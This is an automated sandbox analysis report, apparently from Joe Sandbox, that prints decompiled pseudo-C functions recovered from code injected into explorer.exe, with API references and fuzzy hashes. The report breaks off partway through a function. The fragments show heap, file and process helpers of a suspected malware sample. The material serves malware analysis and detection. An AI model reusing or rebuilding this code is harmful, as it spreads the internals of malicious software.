                                          • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                                          • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                                          • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008B269(WCHAR* __ecx) {
                                          
                                          				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                          			}




                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                                          • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                                          • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                                          • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000885EF() {
                                          				void* _t1;
                                          
                                          				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                          				 *0x9e768 = _t1;
                                          				return _t1;
                                          			}





                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                                          • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                                          • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                                          • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0008F9BF(void* __edx) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				intOrPtr _t26;
                                          				char _t27;
                                          				intOrPtr _t29;
                                          				void* _t31;
                                          				void* _t36;
                                          				char _t38;
                                          				intOrPtr _t39;
                                          				char _t42;
                                          				intOrPtr _t51;
                                          				intOrPtr _t52;
                                          				intOrPtr* _t63;
                                          				intOrPtr _t66;
                                          				char* _t67;
                                          				intOrPtr _t69;
                                          				char _t78;
                                          				void* _t81;
                                          				void* _t82;
                                          
                                          				_t26 =  *0x9e654; // 0x34fd30
                                          				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                                          				_v12 = _t27;
                                          				if(_t27 != 0) {
                                          					_t63 =  *0x9e654; // 0x34fd30
                                          					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                                          						E000886E1(_t27,  *_t63, 0x400);
                                          						_v8 = 0;
                                          						_t36 = E0008109A(_t63, 0x34a);
                                          						_t66 =  *0x9e688; // 0xb0000
                                          						_t72 =  !=  ? 0x67d : 0x615;
                                          						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                                          						_push(0);
                                          						_push(_t36);
                                          						_t67 = "\\";
                                          						_v24 = _t38;
                                          						_push(_t67);
                                          						_push(_t38);
                                          						_t39 =  *0x9e688; // 0xb0000
                                          						_push(_t67);
                                          						_v20 = E000892E5(_t39 + 0x1020);
                                          						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                                          						_v16 = _t42;
                                          						E000885D5( &_v24);
                                          						E000885D5( &_v20);
                                          						_t73 = _v16;
                                          						_t82 = _t81 + 0x3c;
                                          						_t69 = _v8;
                                          						if(_v16 != 0 && _t69 > 0x400) {
                                          							_t51 =  *0x9e654; // 0x34fd30
                                          							_t52 =  *((intOrPtr*)(_t51 + 4));
                                          							_t53 =  <  ? _t69 : _t52;
                                          							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                                          							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                                          							_t69 = _v8;
                                          							_t82 = _t82 + 0xc;
                                          						}
                                          						E0008861A( &_v16, _t69);
                                          						E0008861A( &_v20, 0xfffffffe);
                                          						_t27 = _v12;
                                          						_t81 = _t82 + 0x10;
                                          						_t63 =  *0x9e654; // 0x34fd30
                                          					}
                                          					_t78 = 0;
                                          					while(1) {
                                          						_t29 =  *0x9e688; // 0xb0000
                                          						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                                          						_t81 = _t81 + 0xc;
                                          						if(_t31 >= 0) {
                                          							break;
                                          						}
                                          						Sleep(1);
                                          						_t78 = _t78 + 1;
                                          						if(_t78 < 0x2710) {
                                          							_t27 = _v12;
                                          							_t63 =  *0x9e654; // 0x34fd30
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					E0008861A( &_v12, 0);
                                          				}
                                          				return 0;
                                          			}


























                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapSleep
                                          • String ID:
                                          • API String ID: 4201116106-0
                                          • Opcode ID: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
                                          • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                                          • Opcode Fuzzy Hash: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
                                          • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                          				char _v8;
                                          				WCHAR* _v12;
                                          				signed int _v16;
                                          				WCHAR* _v20;
                                          				short _t30;
                                          				short _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t45;
                                          				short _t49;
                                          				void* _t52;
                                          				char _t71;
                                          				WCHAR* _t72;
                                          
                                          				_v16 = _v16 & 0x00000000;
                                          				_t71 = 0;
                                          				_v12 = __ecx;
                                          				_t49 = __edx;
                                          				_v8 = 0;
                                          				_t72 = E00088604(0x448);
                                          				_v20 = _t72;
                                          				_pop(_t52);
                                          				if(_t72 != 0) {
                                          					_t72[0x21a] = __edx;
                                          					_t72[0x21c] = _a8;
                                          					lstrcpynW(_t72, _v12, 0x200);
                                          					if(_t49 != 1) {
                                          						_t30 = E00088604(0x100000);
                                          						_t72[0x212] = _t30;
                                          						if(_t30 != 0) {
                                          							_t69 = _a4;
                                          							_t72[0x216] = 0x100000;
                                          							if(_a4 != 0) {
                                          								E000887EA(_t72, _t69);
                                          							}
                                          							L16:
                                          							return _t72;
                                          						}
                                          						L7:
                                          						if(_t71 != 0) {
                                          							E0008861A( &_v8, 0);
                                          						}
                                          						L9:
                                          						_t33 = _t72[0x218];
                                          						if(_t33 != 0) {
                                          							_t38 =  *0x9e684; // 0x34f8f0
                                          							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                                          						}
                                          						_t73 =  &(_t72[0x212]);
                                          						if(_t72[0x212] != 0) {
                                          							E0008861A(_t73, 0);
                                          						}
                                          						E0008861A( &_v20, 0);
                                          						goto L1;
                                          					}
                                          					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                                          					_t71 = _t43;
                                          					_v8 = _t71;
                                          					if(_t71 == 0) {
                                          						goto L9;
                                          					}
                                          					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                                          						goto L7;
                                          					} else {
                                          						_t45 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                          						_t72[0x218] = _t72[0x218] & 0x00000000;
                                          						E0008861A( &_v8, 0);
                                          						goto L16;
                                          					}
                                          				}
                                          				L1:
                                          				return 0;
                                          			}

















                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcpyn
                                          • String ID:
                                          • API String ID: 680773602-0
                                          • Opcode ID: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
                                          • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                                          • Opcode Fuzzy Hash: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
                                          • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0008E2C6(void* __fp0, intOrPtr _a4) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				char _v32;
                                          				char _v544;
                                          				signed int _t40;
                                          				intOrPtr _t41;
                                          				intOrPtr _t48;
                                          				intOrPtr _t58;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				void* _t70;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t77;
                                          
                                          				_t77 = __fp0;
                                          				_v20 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				_t66 =  *0x9e6b4; // 0x34fa98, executed
                                          				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                          				if(_t40 == 0) {
                                          					_t73 = 0;
                                          					if(_v20 <= 0) {
                                          						L9:
                                          						_t41 =  *0x9e6b4; // 0x34fa98
                                          						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                          						return 0;
                                          					}
                                          					do {
                                          						_v16 = 0;
                                          						_v12 = 0;
                                          						_t48 =  *0x9e68c; // 0x34fab8
                                          						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                          						_t70 = E00088604(_v16 + 1);
                                          						if(_t70 != 0) {
                                          							_v12 = 0x200;
                                          							_push( &_v32);
                                          							_push( &_v12);
                                          							_push( &_v544);
                                          							_push( &_v16);
                                          							_push(_t70);
                                          							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                          							_t58 =  *0x9e68c; // 0x34fab8
                                          							_push(0);
                                          							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                          								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                          								_t75 = _t75 + 0xc;
                                          								Sleep(0xa);
                                          							}
                                          						}
                                          						_t73 = _t73 + 1;
                                          					} while (_t73 < _v20);
                                          					goto L9;
                                          				}
                                          				return _t40 | 0xffffffff;
                                          			}






















                                          APIs
                                          • Sleep.KERNELBASE(0000000A), ref: 0008E394
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
                                          • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                                          • Opcode Fuzzy Hash: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
                                          • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                                          				intOrPtr _v8;
                                          				signed int _v16;
                                          				char _v20;
                                          				void* _t24;
                                          				char _t25;
                                          				signed int _t30;
                                          				intOrPtr* _t45;
                                          				signed int _t46;
                                          				void* _t47;
                                          				void* _t54;
                                          
                                          				_t54 = __fp0;
                                          				_t45 = __edx;
                                          				_t46 = 0;
                                          				_t30 = __ecx;
                                          				if( *__edx > 0) {
                                          					do {
                                          						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                                          						if(_t24 == 0) {
                                          							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                                          							_v8 = _t25;
                                          							if(_t25 != 0) {
                                          								L6:
                                          								_v16 = _v16 & 0x00000000;
                                          								_v20 = _t25;
                                          								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                                          								_t47 = _t47 + 0xc;
                                          							} else {
                                          								if(GetLastError() != 0xd) {
                                          									_t25 = _v8;
                                          									goto L6;
                                          								} else {
                                          									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                                          								}
                                          							}
                                          						}
                                          						_t46 = _t46 + 1;
                                          					} while (_t46 <  *_t45);
                                          				}
                                          				return 0;
                                          			}














                                          APIs
                                            • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                                          • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                                          • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                                          • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                                          • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E00085D7D(void* __eflags) {
                                          				char _v44;
                                          				intOrPtr _t7;
                                          				intOrPtr _t10;
                                          				void* _t11;
                                          				WCHAR* _t12;
                                          				WCHAR* _t13;
                                          				WCHAR* _t14;
                                          				intOrPtr _t15;
                                          				intOrPtr _t19;
                                          				intOrPtr _t22;
                                          				void* _t27;
                                          				WCHAR* _t28;
                                          
                                          				_t7 =  *0x9e688; // 0xb0000
                                          				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                                          				_t10 =  *0x9e684; // 0x34f8f0
                                          				_t28 = 2;
                                          				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                                          				if(_t11 == 0) {
                                          					_t22 =  *0x9e688; // 0xb0000
                                          					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                                          					 *0x9e6ac = _t12;
                                          					__eflags = _t12;
                                          					if(_t12 != 0) {
                                          						_t14 = E00089EBB();
                                          						__eflags = _t14;
                                          						if(_t14 == 0) {
                                          							_t28 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t15 =  *0x9e688; // 0xb0000
                                          							lstrcmpiW(_t15 + 0x228, _t14);
                                          							asm("sbb esi, esi");
                                          							_t28 = _t28 + 1;
                                          						}
                                          					}
                                          					_t13 = _t28;
                                          				} else {
                                          					_t19 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                                          					_t13 = 3;
                                          				}
                                          				return _t13;
                                          			}
















                                          APIs
                                          • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpi
                                          • String ID:
                                          • API String ID: 1586166983-0
                                          • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                                          • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                                          • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                                          • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008BA05() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          				void* _t18;
                                          				void* _t21;
                                          				intOrPtr _t22;
                                          				void* _t24;
                                          				void* _t30;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t15 =  *0x9e68c; // 0x34fab8
                                          				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                                          				if(_t16 != 0) {
                                          					_v12 = _v12 & 0x00000000;
                                          					_t18 = E0008B998(1,  &_v12); // executed
                                          					_t30 = _t18;
                                          					if(_t30 != 0) {
                                          						CloseHandle(_v8);
                                          						_t21 = _t30;
                                          					} else {
                                          						if(_v8 != _t18) {
                                          							_t22 =  *0x9e684; // 0x34f8f0
                                          							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                                          						}
                                          						_t21 = 0;
                                          					}
                                          					return _t21;
                                          				} else {
                                          					return _t16;
                                          				}
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                                          • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                                          • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                                          • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                                          				void _v44;
                                          				signed int _t8;
                                          				intOrPtr _t14;
                                          				intOrPtr _t15;
                                          				intOrPtr _t21;
                                          				void* _t24;
                                          				void* _t29;
                                          				void* _t35;
                                          
                                          				_t35 = __eflags;
                                          				_t24 = __ecx;
                                          				_t8 =  *0x9e688; // 0xb0000
                                          				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                          				E000885EF();
                                          				E00088F78();
                                          				 *0x9e780 = 0;
                                          				 *0x9e784 = 0;
                                          				 *0x9e77c = 0;
                                          				E00085EB6(); // executed
                                          				E0008CF84(_t24);
                                          				_t14 =  *0x9e688; // 0xb0000
                                          				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                                          				_t15 =  *0x9e688; // 0xb0000
                                          				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                                          				E0008B337( &_v44);
                                          				memset( &_v44, 0, 0x27);
                                          				E00085C26( &_v44, __fp0);
                                          				_t21 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                                          				return 0;
                                          			}


                                          APIs
                                            • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                            • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                                            • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                                            • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                                            • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                                            • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                                            • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                                          • memset.MSVCRT ref: 00085D5F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                                          • String ID:
                                          • API String ID: 4245722550-0
                                          • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                                          • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                                          • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                                          • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008861A(int _a4, intOrPtr _a8) {
                                          				int _t3;
                                          				intOrPtr _t4;
                                          				void* _t9;
                                          
                                          				_t3 = _a4;
                                          				if(_t3 == 0) {
                                          					return _t3;
                                          				}
                                          				_t9 =  *_t3;
                                          				if(_t9 != 0) {
                                          					 *_t3 =  *_t3 & 0x00000000;
                                          					_t4 = _a8;
                                          					if(_t4 != 0xffffffff) {
                                          						if(_t4 == 0xfffffffe) {
                                          							_t4 = E0008C392(_t9);
                                          						}
                                          					} else {
                                          						_t4 = E0008C379(_t9);
                                          					}
                                          					E0008874F(_t9, 0, _t4);
                                          					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                                          				}
                                          				return _t3;
                                          			}


                                          APIs
                                          • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                                          • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                                          • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                                          • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _t5;
                                          				void* _t6;
                                          				void* _t10;
                                          				long _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 2;
                                          				_t5 = E0008A5F7(_a4, _t15);
                                          				_t17 = _t5;
                                          				if(_t17 != 0) {
                                          					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                                          					if(_t6 != 0) {
                                          						CloseHandle(_t17);
                                          						return 0;
                                          					}
                                          					_t10 = 0xfffffffe;
                                          					return _t10;
                                          				}
                                          				return _t5 | 0xffffffff;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                                          • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                                          • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                                          • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0008B337(void* __ecx) {
                                          				intOrPtr _t4;
                                          				void* _t5;
                                          				intOrPtr _t6;
                                          				void* _t12;
                                          				void* _t13;
                                          
                                          				_t4 =  *0x9e684; // 0x34f8f0
                                          				_t13 = 0;
                                          				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                                          				_t12 = _t5;
                                          				if(_t12 != 0) {
                                          					_t6 =  *0x9e684; // 0x34f8f0
                                          					_push(_t12);
                                          					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                                          						_t13 = 1;
                                          					}
                                          					CloseHandle(_t12);
                                          					return _t13;
                                          				}
                                          				return _t5;
                                          			}


                                          APIs
                                          • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                                          • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                                          • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                                          • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 86%
                                          			E0008D01F(void* __fp0) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				struct _SYSTEM_INFO _v52;
                                          				char _v180;
                                          				char _v692;
                                          				char _v704;
                                          				char _v2680;
                                          				void* __esi;
                                          				struct _OSVERSIONINFOA* _t81;
                                          				intOrPtr _t83;
                                          				void* _t84;
                                          				long _t86;
                                          				intOrPtr* _t88;
                                          				intOrPtr _t90;
                                          				intOrPtr _t95;
                                          				intOrPtr _t97;
                                          				void* _t98;
                                          				intOrPtr _t103;
                                          				char* _t105;
                                          				void* _t108;
                                          				char _t115;
                                          				signed int _t117;
                                          				char _t119;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t130;
                                          				intOrPtr _t134;
                                          				intOrPtr _t147;
                                          				intOrPtr _t149;
                                          				intOrPtr _t152;
                                          				intOrPtr _t154;
                                          				signed int _t159;
                                          				struct HINSTANCE__* _t162;
                                          				short* _t164;
                                          				intOrPtr _t167;
                                          				WCHAR* _t168;
